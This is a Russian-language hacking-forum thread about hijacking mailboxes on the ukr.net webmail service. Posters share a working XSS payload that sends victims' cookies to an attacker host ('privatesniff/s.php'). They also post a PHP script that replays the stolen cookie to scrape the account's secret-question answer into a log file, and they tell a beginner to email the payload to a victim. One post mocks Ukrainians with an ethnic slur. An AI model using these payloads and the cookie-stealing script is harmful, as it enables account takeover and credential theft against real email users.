www.ukr.net Считываем ответ на секретный вопрос Code: <embed src=javasc но как? и куда его пихать, расжите плиз, очень надо! =)
ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ! Регистрация нового ящика доступна только с территории Украины. То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.
я его отсюда взял http://antichat.ru/txt/hmail/ полный код <embed src=javascript:this.wav>
Дружище...Если ты его там взял то по ходу и прочитать должен был все... Там все доходчиво описано... Читай еще и еще и еще раз. Пока не поймешь.
Взлом ящика на http://www.ukr.net/ Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию. Теперь по делу. На исследования ушло ровным счетом 7 минут. Диагноз: Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример: Code: <img src=javascript:alert('ANTICHAT.RU');> (javascript в ASCII) В общем, полноценная активная xss в теле письма найдена. Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит. В дополнение ко всему мною были отмечены следущие особенности: В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для [email protected] секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется". В общем, простор для творчества очень широкий. Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется). Актуально под IE6 и Opera 8.51 (Другие не пробовал)
Захват ящика на ukr.net Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится. Code: <img src="[url="http://privatesniff/1.gif"]http://privatesniff/1.gif"style="background:white[/url] url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> PHP: <? $query=$_SERVER["QUERY_STRING"];$query=urldecode($query);$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n"; $header.="Referer: http://e.ukr.net\r\n";$header.="Cookie: ".$query."\r\n";$header.="Host: e.ukr.net\r\n\r\n";$fp=fsockopen("e.ukr.net", 80); fwrite($fp, $header); $dt=""; while (!feof($fp)) $dt.=fread($fp, 1024); $pass1=strpos($dt,'Password_Answer')+24; $pass2=strpos($dt,'" size="40"><br><br></td>'); $length_pass=$pass2-$pass1; $password=substr($dt,$pass1,$length_pass); $f1=Fopen("password.html","a"); fwrite($f1,"$password<br /><hr>"); fclose($f1); fclose($fp); ?> Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.
это посылаешь на мыло в письме жертве Code: <img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> а код php сюда _http:// privatesniff/s.php сюда
Неплохо мы тут этот ukr.net разнесли) Хохлы.. В следующий раз сразу на наши условия соглашаться будут =) Хорошая тема. PinkPanther респект, но зря так выложил)
как? я абсолютно нешарю, но очень хочу научится Code: <img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> то куда потом призодит отчет, на моё мло?
Угу, по-моему они прикрыли дыру, когда только Dronga выложил активную хсс и код алерта... Но я думаю там ещё можно покопатся и что-нибудь найти
HTML: <img src="http://privatesniff/1.gif"style="background:white url(javascript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> Можно об этом по-подробнее? Потому, что на одном из интересующих меня операторов проходит
